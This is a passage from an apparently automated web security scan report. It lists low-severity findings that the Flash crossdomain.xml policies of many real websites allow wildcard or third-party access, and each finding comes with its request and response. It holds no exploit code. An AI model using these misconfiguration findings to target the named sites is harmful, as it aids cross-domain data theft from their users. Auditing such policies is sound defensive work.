Set-Cookie: tyrg1st=668553C086D10CAB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.travelocity.com
Set-Cookie: SID=T000V00000X900941104032510625012971825; path=/; domain=.travelocity.com
Last-Modified: Tue, 24 Mar 2009 05:46:07 GMT
ETag: "5a7"
Accept-Ranges: bytes
Content-Length: 1447
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="i.travelpn.com.edgesuite.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="i.travelpn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="i.travelocity.com.edgesuite.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="i.travelocity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.travelocity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="i.travelocity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="travel.travelocity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ag.travelocity.com.edgesuite.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="hg.travelocity.com.edgesuite.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="design.int.travelocity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.travelpn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dotomi.com" secure="false"/>
...[SNIP]...

7.458. http://www.tripadvisor.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tripadvisor.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tripadvisor.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:18 GMT
Server: Apache
Last-Modified: Mon, 06 Dec 2010 12:09:15 GMT
Accept-Ranges: bytes
Content-Length: 357
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.daodao.com" />
<allow-access-from domain="*.ddcdn.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.tripadvisor.com" />
...[SNIP]...

7.459. http://www.true.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.true.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.true.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 29 Jun 2009 15:30:26 GMT
Accept-Ranges: bytes
ETag: "9a1cbc86cef8c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:40 GMT
Connection: keep-alive
Content-Length: 576
Set-Cookie: NSC_xxx-mc-hsq=445337273660;path=/;domain=true.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!--The site-control element defines the meta-policy for
...[SNIP]...
<allow-access-from domain="*.truebeginnings.com" />
<allow-access-from domain="*.true.com" />
...[SNIP]...

7.460. http://www.trulia.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.trulia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.trulia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15 (EL)
Last-Modified: Wed, 30 Mar 2011 22:59:11 GMT
ETag: "1582730-192-49fbb1ff9adc0"
Accept-Ranges: bytes
Content-Length: 402
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:35:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.trulia.com" />
<allow-access-from domain="*.trulia.com" />
<allow-access-from domain="*.trulia-cdn.com" />
<allow-access-from domain="*.stamen.com" />
<allow-access-from domain="*.2mdn.net"/>
...[SNIP]...

7.461. http://www.tv.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tv.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:34 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 465
Keep-Alive: timeout=15, max=995
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="image.com.com" />
<allow-access-from domain="img.gamespot.com" />
<allow-access-from domain="i.i.com.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...

7.462. http://www.tvguide.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tvguide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tvguide.com

Response

HTTP/1.0 200 OK
Content-Length: 1209
Content-Type: text/xml
Last-Modified: Thu, 29 Jul 2010 23:00:39 GMT
Accept-Ranges: bytes
ETag: "3647dcdc712fcb1:1a2d"
Server: Microsoft-IIS/6.0
P3P: policyref=" /w3c/p3p.xml", CP="CAO PSA OUR BUS"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.tvguide.com" secure="false" />
...[SNIP]...
<allow-access-from domain="tvguide.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cmsauthor.tvguide.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.arkadium.com/*" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="testing.arkadium.com/*" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.bignetworkboss.com/*" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mtumi.dev" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.motiontek.dev" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.motiontek.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.maven.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...

7.463. http://www.univision.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.univision.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.univision.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:54:19 GMT
Content-length: 432
Content-type: text/xml
Last-modified: Mon, 20 Dec 2010 16:16:47 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!-- http://www.univision.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.univision.com" />
<allow-access-from domain="*.clearspring.com" />
<allow-access-from domain="*.streamtheworld.com" />
<allow-access-from domain="*.streamtheworld.net" />
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.uvnimg.com" />
...[SNIP]...

7.464. http://www.ups.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ups.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ups.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:16 GMT
Server: Apache
Last-Modified: Sun, 04 Jan 2009 01:06:17 GMT
Accept-Ranges: bytes
Content-Length: 104
Vary: User-Agent
Connection: close
Content-Type: text/xml


<cross-domain-policy>
   <allow-access-from domain="*.ups.com" secure="false"/>
</cross-domain-policy>

7.465. http://www.usatoday.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT
Accept-Ranges: bytes
ETag: "befaf11117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sat, 02 Apr 2011 13:32:44 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

7.466. http://www.use.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.use.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.use.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:20 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Wed, 19 May 2010 22:07:28 GMT
Accept-Ranges: bytes
Content-Length: 185
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <allow-access-from domain="*.torontoflex.com" />
   <allow-access-from domain="*.use.com" />
</cross-domain-policy>

7.467. http://www.usgs.gov/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usgs.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usgs.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:32 GMT
Content-Length: 224
Content-Type: application/xml
ETag: "38331e46-e0-47fbc40961741"
Last-Modified: Tue, 16 Feb 2010 18:53:41 GMT
Accept-Ranges: bytes
Server: Footprint Distributor V4.6
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
   <cross-domain-policy>
       <allow-access-from domain="*.usgs.gov" to-ports="80" />
...[SNIP]...

7.468. http://www.usmagazine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usmagazine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usmagazine.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix) DAV/2 mod_jk/1.2.28 PHP/5.2.10
Last-Modified: Tue, 08 Feb 2011 20:21:10 GMT
ETag: "e254e7-2d3-49bcb16cc5980"
Content-Type: application/xml
Content-Length: 723
X-Varnish: 246730193 246729216
Date: Sat, 02 Apr 2011 13:26:43 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gstatic.com" secure="false"/>
...[SNIP]...

7.469. http://www.vast.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vast.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vast.com

Response

HTTP/1.1 200 OK
ETag: "1ae1a37-16d-49f03a2fc3ac0"
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa CONi TELi OUR BUS IND PHY ONL UNI COM NAV INT DEM STA"
Accept-Ranges: bytes
Content-Length: 365
Date: Sat, 02 Apr 2011 13:43:38 GMT
Connection: close
Last-Modified: Mon, 21 Mar 2011 20:04:35 GMT
Server: Apache
Content-Type: text/xml
Keep-Alive: timeout=15, max=78

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.aolcdn.com"/>
...[SNIP]...

7.470. http://www.verizon.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.verizon.net

Response

HTTP/1.0 200 OK
Content-Length: 375
Content-Type: text/xml
Last-Modified: Wed, 28 Oct 2009 19:15:58 GMT
Accept-Ranges: bytes
ETag: "02b2b14358ca1:138d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Sat, 02 Apr 2011 13:37:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:37:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*.verizon.net" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.verizon.com" to-ports="*" secure="false"/>
...[SNIP]...

7.471. http://www.victoriassecret.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.victoriassecret.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.victoriassecret.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 09 Jul 2010 16:21:39 GMT
ETag: "147-48af6cc2e0ac0"
Accept-Ranges: bytes
Content-Length: 327
SID: 502
Content-Type: application/xml
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS UNI PUR NAV INT STA PRE OTC"
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 13:42:33 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.vspink.com" />
   <allow-access-from domain="*.vspink.resource.com" />
   <allow-access-from domain="*.vspinknew.resource.com" />
   <allow-access-from domain="*.victoriassecret.com"/>
   <allow-access-from domain="*.limited.com"/>
...[SNIP]...

7.472. http://www.videobash.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.videobash.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.videobash.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:09 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.13
Last-Modified: Mon, 24 Jan 2011 19:32:09 GMT
ETag: "138-4d3dd3b9"
Accept-Ranges: bytes
Content-Length: 312
Connection: close
Content-Type: application/xml
X-Pad: avoid browser bug
Set-Cookie: RNLBSERVERID=ded543; path=/
Cache-control: private

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.videobash.com" />
   <allow-access-from domain="*.trafficjunky.net" />
   <allow-access-from domain="*.adap.tv" />
...[SNIP]...

7.473. http://www.walletpop.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.walletpop.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.walletpop.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:28 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 318
Keep-Alive: timeout=5, max=999968
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...

7.474. http://www.walmart.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.walmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.walmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15
Last-Modified: Fri, 19 Jun 2009 00:03:46 GMT
ETag: "bf53-137-46ca84217bc80"
Cache-Control: max-age=7200
Expires: Sat, 02 Apr 2011 14:37:43 GMT
Content-Type: application/xml
Date: Sat, 02 Apr 2011 12:37:43 GMT
Content-Length: 311
Connection: close
Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff0907979345525d5f4f58455e445a4a423660;path=/
Set-Cookie: SSLB=0; path=/; domain=.walmart.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.walmart.com" />
<allow-access-from domain="*.richfx.com" />
<allow-access-from domain="*.edgesuite.net" />
...[SNIP]...

7.475. http://www.warnerbros.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.warnerbros.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.warnerbros.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:01 GMT
Server: Apache
X-WBOL-WebServer: www_us
Set-cookie: WBWTID=173.193.214.243-4D972551141000006BF1F2D-www-wb-web05; path=/; expires=Friday, 01-Jan-10 12:00:00 GMT; domain=.warnerbros.com;
Last-Modified: Mon, 06 Jul 2009 20:39:06 GMT
ETag: "6174a7-16a-7f4a8e80"
Accept-Ranges: bytes
Content-Length: 362
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.warnerbros.com" />
   <allow-access-from domain="*.telepixtv.net" />
   <allow-access-from domain="*.telepixtv.com" />
   <allow-access-from domain="*.bunchball.com" />
   <allow-access-from domain="*.bunchball.net" />
...[SNIP]...

7.476. http://www.washingtonpost.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.washingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 06 Feb 2011 23:42:57 GMT
Content-Type: application/xml
Content-Length: 478
X-Cnection: close
Cache-Control: must-revalidate, max-age=4
Date: Sat, 02 Apr 2011 12:43:09 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.washingtonpost.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="*.newsweek.com"/>
<allow-access-from domain="*.digitalink.com"/>
<allow-access-from domain="*.slate.com"/>
<allow-access-from domain="livingstories.googlelabs.com"/>
...[SNIP]...

7.477. http://www.weather.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.weather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weather.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:29 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Server: Apache
SVRNAME: web3x03
Vary: Accept-Encoding
Content-Length: 2010
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.weather.com" />
<allow-access-from domain="*.epicmashup.com" />
<allow-access-from domain="showcase.weather.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.imwx.com" />
<allow-access-from domain="*.rga.com" />
<allow-access-from domain="*.jnj.com" />

<allow-access-from domain="*.zyrtec.com" />
<allow-access-from domain="*.amazonaws.com" />
<allow-access-from domain="*.gigyahosting.com" />
<allow-access-from domain="*.gigyahosting1.com" />
<allow-access-from domain="media.pointroll.com" />
<allow-access-from domain="www.pointroll.com" />
<allow-access-from domain="data.pointroll.com" />
<allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="mirror.pointroll.com" />
<allow-access-from domain="adportal.pointroll.com" />
